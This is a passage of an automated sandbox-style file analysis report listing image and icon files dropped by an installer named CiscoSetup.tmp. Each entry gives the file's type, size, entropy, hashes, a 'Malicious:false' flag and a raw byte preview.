                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
